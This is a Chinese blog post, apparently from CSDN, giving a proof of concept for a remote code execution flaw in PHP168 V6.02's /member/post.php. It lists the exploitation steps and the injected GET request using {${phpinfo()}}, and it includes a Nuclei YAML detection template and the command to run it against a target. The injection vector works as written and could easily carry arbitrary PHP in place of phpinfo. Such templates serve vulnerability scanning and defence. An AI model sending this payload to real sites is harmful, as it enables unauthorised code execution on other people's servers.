Nuclei关于php168 V6.02 的POC

liunx_hello

已于 2023-02-26 10:55:27 修改

阅读量422

点赞数

分类专栏： Nuclei 文章标签： php 安全 web安全

于 2023-02-26 10:54:40 首次发布

本文链接：https://blog.csdn.net/cxyzyywoaini/article/details/129224318

版权

Nuclei 专栏收录该内容

1 篇文章 0 订阅

订阅专栏

漏洞利用

这个漏洞是在 /member/post.php 中存在一个代码执行漏洞

利用步骤：

1. 先注册一个用户
2.执行下面代码，get方式就可以了

http://targetURL/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML

利用Nuclei 进行检测这个漏洞

id: php168-v602

info:
  name: php168-v6.02 - Remote Code Execution
  author: dr_set
  severity: high
  description: PHP168 V6.02 has a remote code execution vulnerability.
  reference: https://www.seebug.org/vuldb/ssvid-94372
  tags: remote, code execution, php168, rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job=endHTML"
#    headers:
#        Cookie: ${cookie}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

# Enhanced by md on 2022/10/05
# 使用方法： 需要加上参数   -H "Cookie: this is cookie"

 ./nuclei.exe   -u http://192.168.83.242:9090/ -t .\php168-v602.yaml -H "Cookie: your Cookie"

如上图所示，当你的php168网站存在这个问题的时候，就会被检测到了

liunx_hello

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Nuclei关于php168 V6.02 的POC

这个漏洞是在 /memberpost.php 中存在一个代码执行漏洞。如上图所示，当你的php168网站存在这个问题的时候，就会被检测到了。2.执行下面代码，get方式就可以了。1. 先注册一个用户。利用Nuclei 进行检测这个漏洞。
复制链接

扫一扫